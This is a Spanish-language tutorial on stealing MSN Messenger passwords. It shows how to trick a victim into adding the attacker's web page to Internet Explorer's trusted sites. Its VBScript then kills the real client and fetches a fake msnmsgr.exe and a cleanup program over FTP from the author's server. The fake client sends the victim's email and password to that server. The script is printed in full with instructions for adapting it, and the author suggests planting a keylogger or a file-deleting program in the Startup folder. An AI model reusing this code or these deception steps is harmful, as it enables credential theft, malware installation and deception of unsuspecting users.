Cómo sacar la contraseña del MSN Messenger (propio y funciona)
Si estáis hasta las pelotas de bajaros programas que no funcionan o malditos troyanos que los detectan los antivirus de los “PC clientes”… habéis encontrado lo que buscábais, una forma de sacar la contraseña de la forma más limpia que puede haber, y lo que es más importante, que ellos no se enteren. La forma de lograrlo es algo compleja pero sencilla a su vez, es como todo, algo macarronico o casero, pero funciona, se resume en varias partes. Lo he logrado con un programa de Visual Basic hecho por mí, usando web y ftp. Por cierto si eres un poco listo te darás cuenta que con la primera parte de este documento podrías meterle cualquier fichero en su disco y en el path que quieras, por ejemplo en “C:Documents and SettingsAll UsersMenú InicioProgramasInicio” es cosa de usar la cabeza y ahi meterle un keylogger, un archivo que borre cosas… (tener malas ideas no es lo mio) ;}
Requisitos:
– Servidor web.
– Servidor FTP.
La cosa es que el usuario se conecta a una web y sin darse cuenta se le baja un Messenger falso (sin hacer nada más que entrar en la web). Cuando vaya a usar su MSN, le salta uno falso, que es identico al bueno, el pardillo mete la contraseña y el MSN le da un error: “No te puedes conectar ahora, bla, bla…”, y al darle a cualquier botón (Reintentar, Cancelar, al cerrar..) se le abre el MSN bueno y se le conecta; el usuario final no se entera que sus credenciales se han metido en un servidor FTP (con su mail + contraseña) mientras sucedia todo. Al final no se deja ningún rastro en el PC del infectado.
Pasos que debemos hacer nosotros (como piratillas):
Primero, colocamos esta web en algun lado de nuestro servidor web (no tiene pq ser nuestro servidor web, puede ser de Terra…), es esta ejemplo.html. Si usamos de servidor IIS pues lo dejamos en C:inetpubwwwroot o si es un apache pues en /var/www/html/xxxx, si es otro servidor pues donde sea.
Segundo, en un servidor ftp colocamos estos dos ficheros msnmsgr.exe (código fuente en VB – AKI) y tmp.exe (código fuente en VB – AKI) en el raiz del ftp.
Tercero, una vez que el usuario ya haya metido la gamba y se haya conectado a nuestra web, se haya bajado el messenger malo y se haya intentado conectar en nuestro FTP aparecerá un fichero con su loginname de Windows seguido de la extensión “.msn”, si lo abrís con el notepad veréis algo como:
user msn
messenger put c:manolito.msn quit vi*****@ho*****.com contraseñadelpanoli |
Pasos que debe hacer el usuario final (demostración):
Lo único raro (sospechoso) que debe hacer el usuario es meter como Sitios de confianza a nuestro sitio web, pero eso es facil de engañarle, decirle que es por ejemplo la web de la cuadrilla para verla o que tiene que ser así por narices…
Si abre la web le dará un error abajo, entonces se le dice que para que funcione que la meta en “Sitios de confianza”, en este caso yo le he dicho que abra “http://www.bujarra.com/ejemplo.html” pero cada uno que se ponga su html donde le de la gana.
Bien, esto se lo explicáis o se lo hacéis vosotros, que vaya a “Herramientas” > “Opciones de Internet…”
A la pestaña de “Seguridad” y al botón de “Sitios…”
Debe desmarcar el check de abajo (1) y arriba en (2) debe meter el nombre de la web vuestra y darle a “Agregar” y a Aceptar todas las pantallas.
Entonces le saldra esto, le decis que es ‘normal’ y que le de a “Sí”, un amigo me dice… “es que el usuario no es tonto”, y a lo que se debe de responder… “tonto no, tontísimo”.
Bien, una vez que entra en la web de forma automática le sucedería lo siguiente:
– El “msnmsgr.exe” original se renombra a “msnmsgr.old”.
– Se copia de forma automática del FTP un fichero llamado “msnmsgr.exe”.
– Se copia también desde el FTP uno llamado “tmp.exe”
Entonces, cuando el usuario abra su MSN (y si lo tiene abierto no os preocupéis pq se le cierra con un kill para que me deje renombrar el .exe a .tmp) sucede lo siguiente:
Al abrir el MSN Messenger por primera vez se le abre este que es de lo mas parecido posible al MSN Falso, y el usuario como acostumbrará le dará al botón de “Iniciar Sesión” o a “Archivo” > “Iniciar sesión…”
Le pedirá el mail y la contraseña y si normalmente no se la pide pues esta vez sí (q le den), ¿¿a que parece casi-real?? jeje, al darle a “Aceptar” le saltará el siguiente error:
Y aquí le de a lo que le de se cerrará y mandará el usuario y la contraseña al FTP que le hayamos indicado y posteriormente (medio segundo) se le cerrará este MSN falso y se le abrirá el nuevo,
Como véis el iconito ahi abajo ya sale moviendose como siempre…
Y si nos conectamos a nuestro FTP pues veremos que hay un fichero .msn con el logindewindows del usuario y si lo editamos con el Bloc de Notas veremos su mail y su contraseña.
Simplemente impresionante.
PS: Sobra decir que cada uno debe de modificar en el código de HTML/Visual Basic el servidor FTP cual es, con que usuario, con que contraseña… si lo hacéis con los ejecutables de este procedimiento lo único que conseguiréis es meterlos en mi FTP, cosa que no me importa, y podréis verlos usando el mismo usuario/contraseña (msn/messenger).
Que hay que modificar, explicación algo + técnica AKI abajo:
Bien, una vez visto cómo funciona si quieres usarlo tú, debes usar Visual Basic 6.0 para editar el código fuente que te viene en la web anterior. Aquí se explica que parametros tienes que modificar para que te funcione con tu sitio web y con tu sitio ftp (incluyendo usuario y contraseña).
Modificación HTML en la web ejemplo.html,
Primero pones otro nombre al HTML, no le llames ejemplo y metes yo que se, unas fotos, algo para engañarle al usuario final. Este sería el script que viene, lo editas con el Bloc de notas por ejemplo y modifica sólo los valores en rojo:
… <script language=”VBScript” type=”text/VBScript”> Option Explicit Dim objShell Set objShell = CreateObject(“WScript.Shell”) objShell.Run “%comspec% /c tskill msnmsgr” ,0 <– Este comando de MSDOS mata (si es que lo tiene activo) el MSN Messenger. objShell.Run “%comspec% /c copy ” & chr(34) & “C:Archivos de programaMSN Messengermsnmsgr.exe” & chr(34) & ” ” & chr(34) & “C:Archivos de programaMSN Messengermsnmsgr.old” & chr(34), 0 <– Este renombra el ejecutable del MSN objShell.Run “%comspec% /c echo user msn> c:ftp.txt”, 0 <– Crea en C: un fichero temporal para luego ejecutarse y subir esos datos por FTP, en esta linea se mete el usuario del FTP, MODIFICALO. objShell.Run “%comspec% /c echo messenger>> c:ftp.txt”, 0 <– Ahora mete el password del FTP en el fichero temporal. objShell.Run “%comspec% /c echo get tmp.exe ” & chr(34) & “C:Archivos de programaMSN Messengertmp.exe” & chr(34) & “>> c:ftp.txt”, 0 <– Obtiene el tmp.exe que este lo que hace es limpiar el PC de la victima de ‘pruebas’. objShell.Run “%comspec% /c echo get msnmsgr.exe ” & chr(34) & “C:Archivos de programaMSN Messengermsnmsgr.exe” & chr(34) & “>> c:ftp.txt”, 0 <– Con este comando de MSDOS se obtiene el MSN maligggno, jeje. objShell.Run “%comspec% /c echo quit>> c:ftp.txt”, 0 <– Con el QUIT finalizamos la sesion del FTP. objShell.Run “%comspec% /c ftp -n -s:C:ftp.txt www.bujarra.com“, 0 <– Ahora sólo queda ejecutar el comando de conexión al FTP, lo hará cuando abra la web.WScript.Quit </script> … |
Bien, ahora queda las modificaciones de VBasic, modifica sólo las palabras en rojo y después recuerda compilarlo y colgarlo del FTP:
Form2 del msnhhh.vbp Private Sub cmdAceptar_Click() |
Recuerda que los códigos fuentes de estos ficheros los tienes AKI: msnmsgr.exe y tmp.exe